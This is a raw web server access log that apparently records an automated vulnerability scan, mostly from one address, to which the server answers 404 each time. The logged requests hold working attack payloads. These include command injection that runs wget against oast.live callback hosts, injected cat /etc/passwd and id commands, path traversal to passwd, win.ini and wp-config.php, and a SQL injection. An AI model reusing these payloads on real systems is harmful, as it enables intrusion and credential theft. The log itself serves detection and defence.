137.220.197.141 - - [21/Jan/2024:10:35:02 +0100] "POST /Collector/diagnostics/ping HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:35:21 +0100] "GET /login HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:35:23 +0100] "POST /Collector/diagnostics/ping HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:35:46 +0100] "GET /login HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:35:48 +0100] "POST /Collector/diagnostics/ping HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:36:03 +0100] "GET /login HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:36:05 +0100] "POST /Collector/diagnostics/trace_route HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:36:23 +0100] "GET /login HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:36:25 +0100] "POST /Collector/diagnostics/trace_route HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:36:32 +0100] "GET /wan.htm HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:36:44 +0100] "GET /cgi-bin/kerbynet?Action=StartSessionSubmit&User='%0acat%20/etc/passwd%0a'&PW HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:36:48 +0100] "GET /login HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:36:50 +0100] "POST /Collector/diagnostics/trace_route HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:36:58 +0100] "GET /cgi-bin/kerbynet?Action=StartSessionSubmit&User='%0acat%20/etc/passwd%0a'&PW HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:37:51 +0100] "GET /wan.htm HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:37:58 +0100] "GET /login HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:38:00 +0100] "POST /Collector/appliancesettings/applianceSettingsFileTransfer HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:38:00 +0100] "GET /wan.htm HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:38:02 +0100] "GET /talari/app/files/2bECymEMAlhnesi4YLXr0DQMurO HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:38:13 +0100] "GET /wan.htm HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:38:54 +0100] "GET /WidgetHandler.ashx?MethodName=Sort&ID=1&row=1&column=%28SELECT%20CONCAT%28CONCAT%28CHAR%28126%29%2C%28SELECT%20SUBSTRING%28%28ISNULL%28CAST%28db_name%28%29%20AS%20NVARCHAR%284000%29%29%2CCHAR%2832%29%29%29%2C1%2C1024%29%29%29%2CCHAR%28126%29%29%29 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:39:07 +0100] "GET /Collector/storagemgmt/apply?data%5B0%5D%5Bhost%5D=%60/bin/wget+http://cmm00rc3m87t5g88qsogw8a981jtusynf.oast.live%60&data%5B0%5D%5Bpath%5D=mypath&data%5B0%5D%5Btype%5D=mytype HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:40:30 +0100] "GET /WidgetHandler.ashx?MethodName=Sort&ID=1&row=1&column=%28SELECT%20CONCAT%28CONCAT%28CHAR%28126%29%2C%28SELECT%20SUBSTRING%28%28ISNULL%28CAST%28db_name%28%29%20AS%20NVARCHAR%284000%29%29%2CCHAR%2832%29%29%29%2C1%2C1024%29%29%29%2CCHAR%28126%29%29%29 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:40:41 +0100] "GET /WidgetHandler.ashx?MethodName=Sort&ID=1&row=1&column=%28SELECT%20CONCAT%28CONCAT%28CHAR%28126%29%2C%28SELECT%20SUBSTRING%28%28ISNULL%28CAST%28db_name%28%29%20AS%20NVARCHAR%284000%29%29%2CCHAR%2832%29%29%29%2C1%2C1024%29%29%29%2CCHAR%28126%29%29%29 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:40:54 +0100] "GET /WidgetHandler.ashx?MethodName=Sort&ID=1&row=1&column=%28SELECT%20CONCAT%28CONCAT%28CHAR%28126%29%2C%28SELECT%20SUBSTRING%28%28ISNULL%28CAST%28db_name%28%29%20AS%20NVARCHAR%284000%29%29%2CCHAR%2832%29%29%29%2C1%2C1024%29%29%29%2CCHAR%28126%29%29%29 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:41:01 +0100] "GET /Collector/nms/addModifyZTDProxy?ztd_server=127.0.0.1&ztd_port=3333&ztd_username=user&ztd_password=$(/bin/wget$IFShttp://cmm00rc3m87t5g88qsog6rja1sytjgxcw.oast.live) HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:41:03 +0100] "GET /wan.htm HTTP/1.1" 404 952
96.127.160.234 - - [21/Jan/2024:10:41:29 +0100] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:41:48 +0100] "GET /wan.htm HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:41:56 +0100] "GET /wp-content/plugins/adaptive-images/adaptive-images-script.php?adaptive-images-settings[source_file]=../../../wp-config.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:41:59 +0100] "GET /login HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:42:01 +0100] "POST /Collector/diagnostics/ping HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:42:06 +0100] "GET /wan.htm HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:42:08 +0100] "GET /login HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:42:10 +0100] "POST /Collector/appliancesettings/applianceSettingsFileTransfer HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:42:12 +0100] "GET /talari/app/files/2bECymEMAlhnesi4YLXr0DQMurO HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:42:20 +0100] "GET /webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:42:22 +0100] "GET /webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc%5cpasswd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:42:37 +0100] "GET /login HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:42:39 +0100] "POST /Collector/appliancesettings/applianceSettingsFileTransfer HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:42:41 +0100] "GET /talari/app/files/2bECymEMAlhnesi4YLXr0DQMurO HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:42:47 +0100] "GET /login HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:42:49 +0100] "POST /Collector/diagnostics/trace_route HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:43:14 +0100] "GET /login HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:43:16 +0100] "POST /Collector/appliancesettings/applianceSettingsFileTransfer HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:43:18 +0100] "GET /talari/app/files/2bECymEMAlhnesi4YLXr0DQMurO HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:43:20 +0100] "GET /wp-content/plugins/adaptive-images/adaptive-images-script.php?adaptive-images-settings[source_file]=../../../wp-config.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:43:30 +0100] "GET /wp-content/plugins/adaptive-images/adaptive-images-script.php?adaptive-images-settings[source_file]=../../../wp-config.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:43:32 +0100] "GET /login HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:43:34 +0100] "POST /Collector/diagnostics/ping HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:43:43 +0100] "GET /wp-content/plugins/adaptive-images/adaptive-images-script.php?adaptive-images-settings[source_file]=../../../wp-config.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:44:18 +0100] "GET /login HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:44:20 +0100] "POST /Collector/diagnostics/ping HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:44:20 +0100] "GET /WidgetHandler.ashx?MethodName=Sort&ID=1&row=1&column=%28SELECT%20CONCAT%28CONCAT%28CHAR%28126%29%2C%28SELECT%20SUBSTRING%28%28ISNULL%28CAST%28db_name%28%29%20AS%20NVARCHAR%284000%29%29%2CCHAR%2832%29%29%29%2C1%2C1024%29%29%29%2CCHAR%28126%29%29%29 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:44:20 +0100] "GET /login HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:44:23 +0100] "POST /Collector/diagnostics/trace_route HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:45:04 +0100] "GET /WealthT24/GetImage?docDownloadPath=/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:45:06 +0100] "GET /WealthT24/GetImage?docDownloadPath=c:/windows/win.ini HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:45:06 +0100] "GET /login HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:45:09 +0100] "POST /Collector/diagnostics/trace_route HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:45:14 +0100] "GET /WidgetHandler.ashx?MethodName=Sort&ID=1&row=1&column=%28SELECT%20CONCAT%28CONCAT%28CHAR%28126%29%2C%28SELECT%20SUBSTRING%28%28ISNULL%28CAST%28db_name%28%29%20AS%20NVARCHAR%284000%29%29%2CCHAR%2832%29%29%29%2C1%2C1024%29%29%29%2CCHAR%28126%29%29%29 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:45:38 +0100] "GET /WidgetHandler.ashx?MethodName=Sort&ID=1&row=1&column=%28SELECT%20CONCAT%28CONCAT%28CHAR%28126%29%2C%28SELECT%20SUBSTRING%28%28ISNULL%28CAST%28db_name%28%29%20AS%20NVARCHAR%284000%29%29%2CCHAR%2832%29%29%29%2C1%2C1024%29%29%29%2CCHAR%28126%29%29%29 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:45:40 +0100] "GET /wan.htm HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:46:34 +0100] "GET /webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:46:36 +0100] "GET /webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc%5cpasswd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:46:44 +0100] "GET /wp-content/plugins/adaptive-images/adaptive-images-script.php?adaptive-images-settings[source_file]=../../../wp-config.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:47:02 +0100] "GET /webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:47:04 +0100] "GET /webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc%5cpasswd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:47:32 +0100] "GET /wp-content/plugins/adaptive-images/adaptive-images-script.php?adaptive-images-settings[source_file]=../../../wp-config.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:47:36 +0100] "GET /wan.htm HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:47:44 +0100] "GET /Collector/storagemgmt/apply?data%5B0%5D%5Bhost%5D=%60/bin/wget+http://cmm00rc3m87t5g88qsogysz4yp6g7s5xa.oast.live%60&data%5B0%5D%5Bpath%5D=mypath&data%5B0%5D%5Btype%5D=mytype HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:47:48 +0100] "GET /wan.htm HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:47:55 +0100] "GET /wp-content/plugins/adaptive-images/adaptive-images-script.php?adaptive-images-settings[source_file]=../../../wp-config.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:48:06 +0100] "GET /WealthT24/GetImage?docDownloadPath=/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:48:08 +0100] "GET /WealthT24/GetImage?docDownloadPath=c:/windows/win.ini HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:48:27 +0100] "GET /WealthT24/GetImage?docDownloadPath=/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:48:29 +0100] "GET /WealthT24/GetImage?docDownloadPath=c:/windows/win.ini HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:48:44 +0100] "GET /Collector/storagemgmt/apply?data%5B0%5D%5Bhost%5D=%60/bin/wget+http://cmm00rc3m87t5g88qsogjg4gaj7u87s91.oast.live%60&data%5B0%5D%5Bpath%5D=mypath&data%5B0%5D%5Btype%5D=mytype HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:48:53 +0100] "GET /WealthT24/GetImage?docDownloadPath=/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:48:55 +0100] "GET /WealthT24/GetImage?docDownloadPath=c:/windows/win.ini HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:49:34 +0100] "GET /base_import/static/c:/windows/win.ini HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:49:36 +0100] "GET /web/static/c:/windows/win.ini HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:49:37 +0100] "GET /Collector/nms/addModifyZTDProxy?ztd_server=127.0.0.1&ztd_port=3333&ztd_username=user&ztd_password=$(/bin/wget$IFShttp://cmm00rc3m87t5g88qsogdyarz97scii8k.oast.live) HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:49:38 +0100] "GET /base/static/c:/windows/win.ini HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:49:53 +0100] "GET /WidgetHandler.ashx?MethodName=Sort&ID=1&row=1&column=%28SELECT%20CONCAT%28CONCAT%28CHAR%28126%29%2C%28SELECT%20SUBSTRING%28%28ISNULL%28CAST%28db_name%28%29%20AS%20NVARCHAR%284000%29%29%2CCHAR%2832%29%29%29%2C1%2C1024%29%29%29%2CCHAR%28126%29%29%29 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:50:01 +0100] "GET /Collector/storagemgmt/apply?data%5B0%5D%5Bhost%5D=%60/bin/wget+http://cmm00rc3m87t5g88qsogkfx3mftxr3c4x.oast.live%60&data%5B0%5D%5Bpath%5D=mypath&data%5B0%5D%5Btype%5D=mytype HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:50:41 +0100] "GET /Collector/nms/addModifyZTDProxy?ztd_server=127.0.0.1&ztd_port=3333&ztd_username=user&ztd_password=$(/bin/wget$IFShttp://cmm00rc3m87t5g88qsogyb6foofttzzgp.oast.live) HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:51:45 +0100] "GET /wp-content/plugins/adaptive-images/adaptive-images-script.php?adaptive-images-settings[source_file]=../../../wp-config.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:52:00 +0100] "GET /Collector/nms/addModifyZTDProxy?ztd_server=127.0.0.1&ztd_port=3333&ztd_username=user&ztd_password=$(/bin/wget$IFShttp://cmm00rc3m87t5g88qsogyycaayy6p33hw.oast.live) HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:52:08 +0100] "GET /WidgetHandler.ashx?MethodName=Sort&ID=1&row=1&column=%28SELECT%20CONCAT%28CONCAT%28CHAR%28126%29%2C%28SELECT%20SUBSTRING%28%28ISNULL%28CAST%28db_name%28%29%20AS%20NVARCHAR%284000%29%29%2CCHAR%2832%29%29%29%2C1%2C1024%29%29%29%2CCHAR%28126%29%29%29 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:52:08 +0100] "GET /login HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:52:10 +0100] "POST /Collector/diagnostics/ping HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:52:14 +0100] "GET /login HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:52:16 +0100] "POST /Collector/appliancesettings/applianceSettingsFileTransfer HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:52:18 +0100] "GET /talari/app/files/2bECymEMAlhnesi4YLXr0DQMurO HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:52:22 +0100] "GET /WidgetHandler.ashx?MethodName=Sort&ID=1&row=1&column=%28SELECT%20CONCAT%28CONCAT%28CHAR%28126%29%2C%28SELECT%20SUBSTRING%28%28ISNULL%28CAST%28db_name%28%29%20AS%20NVARCHAR%284000%29%29%2CCHAR%2832%29%29%29%2C1%2C1024%29%29%29%2CCHAR%28126%29%29%29 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:52:48 +0100] "GET /login HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:52:50 +0100] "POST /Collector/diagnostics/trace_route HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:53:45 +0100] "POST /password_change.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:53:49 +0100] "GET /base_import/static/c:/windows/win.ini HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:53:51 +0100] "GET /web/static/c:/windows/win.ini HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:53:52 +0100] "GET /wp-content/plugins/adaptive-images/adaptive-images-script.php?adaptive-images-settings[source_file]=../../../wp-config.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:53:52 +0100] "GET /base/static/c:/windows/win.ini HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:54:05 +0100] "GET /wp-content/plugins/adaptive-images/adaptive-images-script.php?adaptive-images-settings[source_file]=../../../wp-config.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:54:20 +0100] "GET /base_import/static/c:/windows/win.ini HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:54:22 +0100] "GET /web/static/c:/windows/win.ini HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:54:24 +0100] "GET /base/static/c:/windows/win.ini HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:54:42 +0100] "GET /login HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:54:44 +0100] "POST /Collector/appliancesettings/applianceSettingsFileTransfer HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:54:46 +0100] "GET /talari/app/files/2bECymEMAlhnesi4YLXr0DQMurO HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:54:58 +0100] "GET /base_import/static/c:/windows/win.ini HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:55:00 +0100] "GET /web/static/c:/windows/win.ini HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:55:02 +0100] "GET /base/static/c:/windows/win.ini HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:55:26 +0100] "POST /password_change.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:55:28 +0100] "GET /WealthT24/GetImage?docDownloadPath=/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:55:30 +0100] "GET /WealthT24/GetImage?docDownloadPath=c:/windows/win.ini HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:55:37 +0100] "POST /password_change.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:55:50 +0100] "POST /password_change.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:55:53 +0100] "GET /login HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:55:55 +0100] "POST /Collector/appliancesettings/applianceSettingsFileTransfer HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:55:57 +0100] "GET /talari/app/files/2bECymEMAlhnesi4YLXr0DQMurO HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:56:23 +0100] "GET /login HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:56:25 +0100] "POST /Collector/diagnostics/ping HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:56:51 +0100] "GET /login HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:56:53 +0100] "POST /Collector/diagnostics/ping HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:57:00 +0100] "GET /login HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:57:02 +0100] "POST /Collector/diagnostics/trace_route HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:57:12 +0100] "GET /WealthT24/GetImage?docDownloadPath=/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:57:14 +0100] "GET /WealthT24/GetImage?docDownloadPath=c:/windows/win.ini HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:57:27 +0100] "GET /login HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:57:29 +0100] "POST /Collector/diagnostics/trace_route HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:58:02 +0100] "GET /WealthT24/GetImage?docDownloadPath=/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:58:04 +0100] "GET /WealthT24/GetImage?docDownloadPath=c:/windows/win.ini HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:58:43 +0100] "POST /session_login.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:58:45 +0100] "POST /rpc.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:58:47 +0100] "POST /session_login.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:58:49 +0100] "POST /rpc.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:59:31 +0100] "POST /password_change.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:59:39 +0100] "GET /wp-content/plugins/insert-php/readme.txt HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:00:28 +0100] "POST /password_change.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:00:53 +0100] "POST /password_change.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:01:03 +0100] "GET /wp-content/plugins/insert-php/readme.txt HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:01:13 +0100] "GET /password.jsn HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:01:13 +0100] "GET /wp-content/plugins/insert-php/readme.txt HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:01:25 +0100] "GET /wp-content/plugins/insert-php/readme.txt HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:02:38 +0100] "GET /password.jsn HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:02:48 +0100] "GET /password.jsn HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:03:00 +0100] "GET /password.jsn HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:04:00 +0100] "GET /base_import/static/c:/windows/win.ini HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:04:02 +0100] "GET /web/static/c:/windows/win.ini HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:04:04 +0100] "GET /base/static/c:/windows/win.ini HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:04:21 +0100] "POST /session_login.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:04:23 +0100] "POST /rpc.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:04:25 +0100] "GET /wp-content/plugins/insert-php/readme.txt HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:04:25 +0100] "POST /session_login.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:04:27 +0100] "POST /rpc.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:05:04 +0100] "POST /session_login.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:05:06 +0100] "POST /rpc.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:05:08 +0100] "POST /session_login.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:05:10 +0100] "POST /rpc.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:05:12 +0100] "GET /wp-content/plugins/insert-php/readme.txt HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:05:19 +0100] "POST /password_change.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:05:34 +0100] "GET /wp-content/plugins/insert-php/readme.txt HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:05:52 +0100] "POST /session_login.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:05:54 +0100] "POST /rpc.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:05:56 +0100] "POST /session_login.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:05:58 +0100] "POST /rpc.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:06:00 +0100] "GET /password.jsn HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:06:16 +0100] "GET /WealthT24/GetImage?docDownloadPath=/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:06:18 +0100] "GET /WealthT24/GetImage?docDownloadPath=c:/windows/win.ini HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:06:23 +0100] "GET /base_import/static/c:/windows/win.ini HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:06:25 +0100] "GET /web/static/c:/windows/win.ini HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:06:27 +0100] "GET /base/static/c:/windows/win.ini HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:06:46 +0100] "GET /password.jsn HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:06:46 +0100] "GET /cgi-bin/login_mgr.cgi?C1=ON&cmd=login&f_type=1&f_username=admin&port=80%7Cpwd%26id&pre_pwd=1&pwd=%20&ssl=1&ssl_port=1&username HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:07:08 +0100] "GET /password.jsn HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:07:17 +0100] "GET /catalog.php?filename=../../../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:07:29 +0100] "GET /base_import/static/c:/windows/win.ini HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:07:31 +0100] "GET /web/static/c:/windows/win.ini HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:07:32 +0100] "GET /login HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:07:32 +0100] "POST /password_change.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:07:32 +0100] "GET /base/static/c:/windows/win.ini HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:07:34 +0100] "POST /Collector/appliancesettings/applianceSettingsFileTransfer HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:07:36 +0100] "GET /talari/app/files/2bECymEMAlhnesi4YLXr0DQMurO HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:07:47 +0100] "POST /password_change.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:08:26 +0100] "GET /cgi-bin/login_mgr.cgi?C1=ON&cmd=login&f_type=1&f_username=admin&port=80%7Cpwd%26id&pre_pwd=1&pwd=%20&ssl=1&ssl_port=1&username HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:08:38 +0100] "GET /cgi-bin/login_mgr.cgi?C1=ON&cmd=login&f_type=1&f_username=admin&port=80%7Cpwd%26id&pre_pwd=1&pwd=%20&ssl=1&ssl_port=1&username HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:08:46 +0100] "GET /Collector/storagemgmt/apply?data%5B0%5D%5Bhost%5D=%60/bin/wget+http://cmm00rc3m87t5g88qsogs9gwkudc7kwnt.oast.live%60&data%5B0%5D%5Bpath%5D=mypath&data%5B0%5D%5Btype%5D=mytype HTTP/1.1" 404 952
